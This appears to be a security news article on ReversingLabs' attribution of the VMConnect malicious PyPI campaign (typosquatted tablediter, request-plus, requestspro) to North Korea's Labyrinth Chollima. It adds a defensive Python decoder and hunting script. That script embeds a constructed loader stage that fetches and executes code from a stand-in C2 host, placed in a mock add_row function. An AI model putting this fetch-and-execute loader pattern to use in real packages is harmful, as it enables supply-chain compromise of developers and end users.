ReversingLabs researchers believe that the North Korea-linked APT group Labyrinth Chollima is behind the VMConnect campaign, in which threat actors uploaded a series of malicious packages to the Python Package Index (PyPI). The campaign takes its name from VMConnect, a rogue package that posed as vConnector, the VMware vSphere connector module, and targeted IT professionals.
The state-sponsored hackers uploaded roughly two dozen malicious Python packages to PyPI in early August. The researchers were not able to obtain samples of the second-stage malware used in the campaign.
“The packages mimicked popular open-source Python tools, including vConnector, a wrapper module for pyVmomi VMware vSphere bindings; eth-tester, a collection of tools for testing Ethereum-based applications; and databases, a tool that gives asynchronous support for a range of databases,” states the report published by ReversingLabs. “An analysis of the malicious packages used and their decrypted payloads reveals links to previous campaigns attributed to Labyrinth Chollima, an offshoot of Lazarus Group, a North Korean state-sponsored threat group.”
The researchers also identified three more malicious Python packages that are believed to be a continuation of the VMConnect campaign: tablediter, request-plus, and requestspro.
tablediter mimicked prettytable, a legitimate Python tool that developers use to print tables in an attractive ASCII format. prettytable has more than 9 million monthly downloads, which is why the threat actors targeted its users with a typosquatting attack.
tablediter is very similar to the previously discovered malicious packages in the VMConnect campaign. The most significant difference is that the malicious functionality is not executed when the package is installed, but when the package is used in a project. Instead of running from the __init__.py file at installation time, the malicious code was added to the add_row function of the tablediter class defined in tablediter.py. It therefore executes when a developer tests the application on their workstation, or when an end user runs published software that has incorporated the malicious tablediter dependency. A consequence for defenders is that install-time analysis alone, such as sandboxing the package installation, would not observe the payload.
When the poisoned function runs, it calls a method in bounding.py, a file located in the edt subdirectory. That method receives a parameter that serves as an XOR key and uses it to decrypt a hex-encoded string embedded in the package.
For the other two packages of the trio, request-plus and requestspro, the threat actors appended the “plus” and “pro” suffixes to the name of the legitimate requests library so that the packages would appear to be variants with additional capabilities.
The packages gather information about the infected machine and send it to the C2 server in an HTTP POST request.
The C2 server responds with a Base64/XOR-obfuscated Python module together with execution parameters. That module includes the download URL for the next-stage payload, which the researchers could not retrieve.
“The team believes the module gets executed after decoding and then downloads the next stage of the malware. As was the case in the earlier iteration of the VMConnect campaign, the C2 server associated with the campaign did not provide additional commands by default, but rather waited for a suitable target, making it difficult to assess the full scope of the campaign.” continues the report.
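The hex/XOR decryption in tablediter and the Base64/XOR obfuscation of the C2 reply are the same primitive applied twice, so one worked example covers both passages. The Python below is an added illustration and is not code from the malicious packages or from ReversingLabs: it implements the two decode steps and a small hunting routine that finds long hex literals in a source file, tries every single-byte XOR key, and flags decodes that look like Python. The key (0x5a), the stage text, the domain and the sample source snippet are all constructed for this example; the report does not give the real packages' key length or layout, so the hunt routine's single-byte brute force is a general triage technique rather than a description of the campaign's key.

```python
"""Added example (not code from the VMConnect packages or ReversingLabs):
decoding the two obfuscation layers the article describes and hunting for
hex blobs that decode to Python under a single-byte XOR key.
Key, stage text and sample source below are constructed for this example."""
import base64
import binascii
import re
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: the same call encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_hex_xor(blob: str, key: bytes) -> bytes:
    """tablediter pattern: hex string embedded in the package, XOR key passed in."""
    return xor_bytes(binascii.unhexlify(blob), key)


def decode_b64_xor(blob: str, key: bytes) -> bytes:
    """C2-reply pattern: Base64 body, then XOR, yielding a Python module."""
    return xor_bytes(base64.b64decode(blob), key)


# Substrings a recovered loader stage would plausibly contain.
MARKERS = (b"import ", b"urllib", b"requests", b"exec(", b"http")


def looks_like_python(buf: bytes) -> bool:
    """Cheap plausibility test: ASCII-only with at least two markers present."""
    return buf.isascii() and sum(m in buf for m in MARKERS) >= 2


# Quoted hex literal of 32+ bytes; shorter hex constants are too noisy to flag.
HEX_RE = re.compile(r"""["']([0-9a-fA-F]{64,})["']""")


def hunt_hex_blobs(source: str) -> list:
    """Scan Python source for long hex literals, try every single-byte XOR key
    (0 means the blob was only hex-encoded) and return (offset, key, decoded)
    for plausible decodes. A multi-byte key, which a real loader may well use,
    needs decode_hex_xor with the key recovered from the calling code."""
    hits = []
    for m in HEX_RE.finditer(source):
        try:
            raw = binascii.unhexlify(m.group(1))
        except binascii.Error:
            continue  # odd length: not a hex-encoded byte string
        for k in range(256):
            cand = xor_bytes(raw, bytes([k]))
            if looks_like_python(cand):
                hits.append((m.start(1), k, cand))
    return hits


# Constructed sample: a loader stage that fetches a next-stage URL (the shape
# the article describes), XOR-encoded with key 0x5a and embedded in a module
# that mirrors the add_row / edt/bounding.py layout reported for tablediter.
KEY = b"\x5a"
STAGE = (b"import urllib.request\n"
         b"exec(urllib.request.urlopen('http://c2.example.invalid/next').read())\n")
ENCODED_HEX = xor_bytes(STAGE, KEY).hex()
ENCODED_B64 = base64.b64encode(xor_bytes(STAGE, KEY)).decode()
SAMPLE_SOURCE = ('def add_row(self, row):\n'
                 '    from .edt import bounding\n'
                 f'    bounding.run(0x5a, "{ENCODED_HEX}")\n')

if __name__ == "__main__":
    for offset, key, decoded in hunt_hex_blobs(SAMPLE_SOURCE):
        print(f"offset {offset}: key 0x{key:02x} ->\n{decoded.decode()}")
```

Running the file prints the recovered stage with its key; pointing hunt_hex_blobs at the source files of a suspicious wheel or sdist is a quick first pass before any dynamic analysis, and decode_b64_xor handles a captured C2 reply once the key has been read out of the loader.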
The attribution to the Lazarus subgroup Labyrinth Chollima is based on similarities in the malicious code employed in the campaign. The builder.py file in the malicious packages contains the same payload decoding routine that JPCERT/CC found in a file named py_Qrcode, from activity JPCERT/CC attributes to the Lazarus subgroup it tracks as DangerousPassword.
“Based on those attributions and the described code similarities between the packages discovered in the VMConnect campaign and the campaign described in the research published by JPCERT/CC, the ReversingLabs research team has reached the conclusion that the same threat actor is behind both attacks and, therefore, that the VMConnect malicious campaign activity can be linked to the North Korean state-sponsored Lazarus Group,” concludes the report.
(SecurityAffairs – hacking, North Korea)